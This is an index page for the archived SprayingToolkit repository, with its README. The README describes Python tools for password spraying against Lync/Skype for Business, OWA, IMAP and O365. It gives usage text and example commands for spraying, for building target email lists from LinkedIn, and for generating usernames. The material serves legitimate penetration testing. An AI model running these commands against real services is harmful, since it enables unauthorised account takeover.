Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/byt3bl33d3r/SprayingToolkit
Scripts to make password spraying attacks against Lync/S4B, OWA & O365 a lot quicker, less painful and more efficient
https://github.com/byt3bl33d3r/SprayingToolkit
lync o365 owa password-spraying password-spraying-attacks pentesting python3 red-teams security security-tools skype-for-business
Last synced: 24 days ago
JSON representation
Scripts to make password spraying attacks against Lync/S4B, OWA & O365 a lot quicker, less painful and more efficient
- Host: GitHub
- URL: https://github.com/byt3bl33d3r/SprayingToolkit
- Owner: byt3bl33d3r
- License: gpl-3.0
- Archived: true
- Created: 2018-09-13T09:52:11.000Z (about 6 years ago)
- Default Branch: master
- Last Pushed: 2022-10-17T01:01:57.000Z (about 2 years ago)
- Last Synced: 2024-09-27T03:41:12.250Z (3 months ago)
- Topics: lync, o365, owa, password-spraying, password-spraying-attacks, pentesting, python3, red-teams, security, security-tools, skype-for-business
- Language: Python
- Homepage:
- Size: 115 KB
- Stars: 1,445
- Watchers: 34
- Forks: 265
- Open Issues: 22
-
Metadata Files:
- Readme: README.md
- Funding: .github/FUNDING.yml
- License: LICENSE
Awesome Lists containing this project
- awesome-hacking-lists - byt3bl33d3r/SprayingToolkit - Scripts to make password spraying attacks against Lync/S4B, OWA & O365 a lot quicker, less painful and more efficient (Python)
README
# Deprecation Notice
This project is no longer maintained. The following alternative projects are better and actively maintained:
- [TREVORspray](https://github.com/blacklanternsecurity/TREVORspray)
- [CredMaster](https://github.com/knavesec/CredMaster)# SprayingToolkit
## Description
A set of Python scripts/utilities that *tries* to make password spraying attacks against Lync/S4B & OWA a lot quicker, less painful and more efficient.
## Sponsors
[](https://www.blackhillsinfosec.com/)
[](https://volkis.com.au)
[](https://qomplx.com/blog/cyber/)
[](https://ledgerops.com)
[](https://www.guidepointsecurity.com/)
[](https://lostrabbitlabs.com/)## Official Discord Channel
Come hang out on Discord!
[![Porchetta Industries](https://discordapp.com/api/guilds/736724457258745996/widget.png?style=banner3)](https://discord.gg/khRyjTg)
## Installation
Install the pre-requisites with `pip3` as follows:
```bash
sudo -H pip3 install -r requirements.txt
```Or use a Python virtual environment if you don't want to install the packages globally.
## Tool Overview
### Atomizer
A blazing fast password sprayer for Lync/Skype For Business and OWA, built on Asyncio and Python 3.7
#### Usage
```
Usage:
atomizer (lync|owa|imap) [--targetPort PORT] [--threads THREADS] [--debug]
atomizer (lync|owa|imap) --intervalArguments:
target target domain or url
password password to spray
userfile file containing usernames (one per line)
passwordfile file containing passwords (one per line)Options:
-h, --help show this screen
-v, --version show version
-c, --csvfile CSVFILE csv file containing usernames and passwords
-i, --interval TIME spray at the specified interval [format: "H:M:S"]
-t, --threads THREADS number of concurrent threads to use [default: 3]
-d, --debug enable debug output
-p, --targetPort PORT target port of the IMAP server (IMAP only) [default: 993]
--recon only collect info, don't password spray
--gchat URL gchat webhook url for notification
--slack URL slack webhook url for notification
--user-row-name NAME username row title in CSV file [default: Email Address]
--pass-row-name NAME password row title in CSV file [default: Password]
--user-as-pass USERFILE use the usernames in the specified file as the password (one per line)
```#### Examples
```bash
./atomizer.py owa contoso.com 'Fall2018' emails.txt
``````bash
./atomizer.py lync contoso.com 'Fall2018' emails.txt
``````bash
./atomizer lync contoso.com --csvfile accounts.csv
``````bash
./atomizer lync contoso.com --user-as-pass usernames.txt
``````bash
./atomizer owa 'https://owa.contoso.com/autodiscover/autodiscover.xml' --recon
``````bash
./atomizer.py owa contoso.com passwords.txt emails.txt -i 0:45:00 --gchat
```### Vaporizer
A port of [@OrOneEqualsOne](https://twitter.com/OrOneEqualsOne)'s [GatherContacts](https://github.com/clr2of8/GatherContacts) Burp extension to [mitmproxy](https://mitmproxy.org/) with some improvements.
Scrapes Google and Bing for LinkedIn profiles, automatically generates emails from the profile names using the specified pattern and performes password sprays in real-time.
(Built on top of Atomizer)
#### Examples
```bash
mitmdump -s vaporizer.py --set sprayer=(lync|owa) --set domain=domain.com --set target= --set password=password --set email_format='{f}.{last}'
```By default `email_format` is set to `{first}.{last}` pattern and is not a required argument.
The `domain` parameter is the domain to use for generating emails from names, the `target` parameter is the domain or url to password spray
Install the mitmproxy cert, set the proxy in your browser, go to google and/or bing and search (make sure to include the `/in`):
`site:linkedin.com/in "Target Company Name"`
Emails will be dumped to `emails.txt` in the specified format, and passed to Atomizer for spraying.
### Aerosol
Scrapes all text from the target website and sends it to [AWS Comprehend](https://aws.amazon.com/comprehend/) for analysis to generate custom wordlists for password spraying.
**Still a work in progress**
#### Usage
```bash
mitmdump -s aerosol.py --set domain=domain.com
```### Spindrift
Converts names to active directory usernames (e.g `Alice Eve` => `CONTOSO\aeve`)
#### Usage
```
Usage:
spindrift [] [--target TARGET | --domain DOMAIN] [--format FORMAT]Arguments:
file file containing names, can also read from stdinOptions:
--target TARGET optional domain or url to retrieve the internal domain name from OWA
--domain DOMAIN manually specify the domain to append to each username
--format FORMAT username format [default: {f}{last}]
```#### Examples
Reads names from STDIN, `--domain` is used to specify the domain manually:
```bash
cat names.txt | ./spindrift.py --domain CONTOSO
```Reads names from `names.txt`, `--target` dynamically grabs the internal domain name from OWA (you can give it a domain or url)
```bash
./spindrift.py names.txt --target contoso.com
```